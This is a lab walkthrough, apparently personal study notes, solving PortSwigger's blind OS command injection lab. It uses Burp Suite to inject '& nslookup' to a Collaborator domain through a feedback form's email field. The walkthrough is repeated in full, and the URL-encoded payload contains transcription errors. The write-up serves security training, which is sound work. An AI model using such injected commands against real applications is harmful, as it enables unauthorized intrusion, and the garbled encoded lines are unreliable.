Open up Burp Suite by clicking on the Kali Linux icon on the left upper corner to expand the menu.
Type in: "Burp Suite" on the search bar.
- Click on "OK".
- Click on "I Accept".
- Click on "Next".
- Click on "Start Burp".
Intercept Requests Using Burp Proxy
- Once Burp Suite finished loading, click on "Proxy".
- Click on "Open browser".
Navigate to Command Injection Labs in Portswigger On Burp Suite Browser
- Log in to [PortSwigger](https://portswigger.net/) Website.
- Click on the three line under "MY ACCOUNT" on Portswigger Website. Then, click on "Academy".
- Click on the expand button. Then, click on "Latest topics" and "View all topics".
- Scroll down and click on "Command Injection".
- Scroll down and click on the lab "Blind OS command injection with out-of-band interaction".
- Click on "ACCESS THE LAB".
Lab Description:
This lab features a blind OS command injection vulnerability within the feedback function.
The application runs a user-supplied shell command in an asynchronous manner, without affecting its response. While it's impossible to redirect output to an accessible location, you can initiate out-of-band interactions with an external domain.
To complete the lab, exploit the blind OS command injection to perform a DNS lookup using Burp Collaborator.
Lab Solution
The target goal: Exploit blind OS command injection to issue a DNS lookup to Burp Collaborator.
Analysis: "& nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #".
- It is not possible to redirect output into a location that you can access.
- Navigate to Burp Suite turn Intercept On by clicking on "Intercept is off".
- Navigate to the Intercept Browser, click on "Submit feedback".
- Navigate back to Burp Suite turn Intercept On by clicking on "Intercept is on".
- Navigate back to the Intercept Browser, fill in the "Submit feedback".
- Name: "test".
- Email: "test@test.ca".
- Subject: "test".
- Message: "test".
- Click on "Submit feedback".
- Notice a "post request" for "feedback/submit" have generated on Burp Suite on the "HTTP history" tab.
- Click on the post request. Right-click on the request on the bottom and select "Send to Repeater".
- Click on "Send" to see if it's working.
- Click on "Burp" on the upper left corner. Then, "Burp Collaborator Client".
- Click on "Copy to clipboard" on the pop up window.
- "zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net" is going to be the external server that we control.
- Going to try to perform DNS lookup on the server to confirm that this is vulnerable to blind command injection.
- Add in: "&" to do a chaining command. Then use the "nslookup" command on the collaborator client. At the end, put a "#" to make the rest of the command a comment.
- Command will be: "``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #```".
- Put the command into the email section that is vulnerable to blind command injection.
- Command turn into: "csrf-FhT12DC0irG0s0G4Pz4NVd11S3fPmOaQ&name=test&email-test%40test.ca``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #```&subject= test&message=test".
- Highlight ``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #``` and press "Ctrl + U" to encode it.
- Command turn into: "```csrf-FhT1ZDC0irG0s0G4Pz4NVd11S3fPmOaQ&name=test&email=test%40test.ca+%26+nslookup+zorh37nyfzjbsglnog7j9m16zx5ntc.burpcollaborator.net+823&subject=test&message-test```".
- Click on "Send".
- Navigate to the "Burp Collaborator Client".
- Click on "Poll Now".
- Two ping back for the DNS request to our domain. This means it is vulnerable to blind command injection.
Lab 4 - Blind OS Command Injection with Out-of-Band Interaction
Lab 4: Setup
Burp Suite Startup
Disclaimer: This lab needs Burp Suite Professional version, which I don't have so part of the lab is from video - https://www.youtube.com/watch?v=GUT03VBj7Vc
- Click on "OK".
- Click on "I Accept".
- Click on "Next".
- Click on "Start Burp".
Intercept Requests Using Burp Proxy
- Once Burp Suite finished loading, click on "Proxy".- Click on "Open browser".
Navigate to Command Injection Labs in Portswigger On Burp Suite Browser
- Log in to [PortSwigger](https://portswigger.net/) Website. - Click on the three line under "MY ACCOUNT" on Portswigger Website. Then, click on "Academy".- Click on the expand button. Then, click on "Latest topics" and "View all topics".
- Scroll down and click on "Command Injection".
- Scroll down and click on the lab "Blind OS command injection with out-of-band interaction".
- Click on "ACCESS THE LAB".
Lab Description:
This lab features a blind OS command injection vulnerability within the feedback function. The application runs a user-supplied shell command in an asynchronous manner, without affecting its response. While it's impossible to redirect output to an accessible location, you can initiate out-of-band interactions with an external domain. To complete the lab, exploit the blind OS command injection to perform a DNS lookup using Burp Collaborator.Lab Solution
The target goal: Exploit blind OS command injection to issue a DNS lookup to Burp Collaborator. Analysis: "& nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #". - It is not possible to redirect output into a location that you can access. - Navigate to Burp Suite turn Intercept On by clicking on "Intercept is off".- Navigate to the Intercept Browser, click on "Submit feedback".
- Navigate back to Burp Suite turn Intercept On by clicking on "Intercept is on".
- Navigate back to the Intercept Browser, fill in the "Submit feedback". - Name: "test". - Email: "test@test.ca". - Subject: "test". - Message: "test". - Click on "Submit feedback".
- Notice a "post request" for "feedback/submit" have generated on Burp Suite on the "HTTP history" tab.
- Click on the post request. Right-click on the request on the bottom and select "Send to Repeater".
- Click on "Send" to see if it's working.
- Click on "Burp" on the upper left corner. Then, "Burp Collaborator Client".
- Click on "Copy to clipboard" on the pop up window.
- "zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net" is going to be the external server that we control. - Going to try to perform DNS lookup on the server to confirm that this is vulnerable to blind command injection. - Add in: "&" to do a chaining command. Then use the "nslookup" command on the collaborator client. At the end, put a "#" to make the rest of the command a comment. - Command will be: "``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #```". - Put the command into the email section that is vulnerable to blind command injection. - Command turn into: "csrf-FhT12DC0irG0s0G4Pz4NVd11S3fPmOaQ&name=test&email-test%40test.ca``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #```&subject= test&message=test". - Highlight ``` & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net #``` and press "Ctrl + U" to encode it. - Command turn into: "```csrf-FhT1ZDC0irG0s0G4Pz4NVd11S3fPmOaQ&name=test&email=test%40test.ca+%26+nslookup+zorh37nyfzjbsglnog7j9m16zx5ntc.burpcollaborator.net+823&subject=test&message-test```". - Click on "Send".
- Navigate to the "Burp Collaborator Client". - Click on "Poll Now". - Two ping back for the DNS request to our domain. This means it is vulnerable to blind command injection.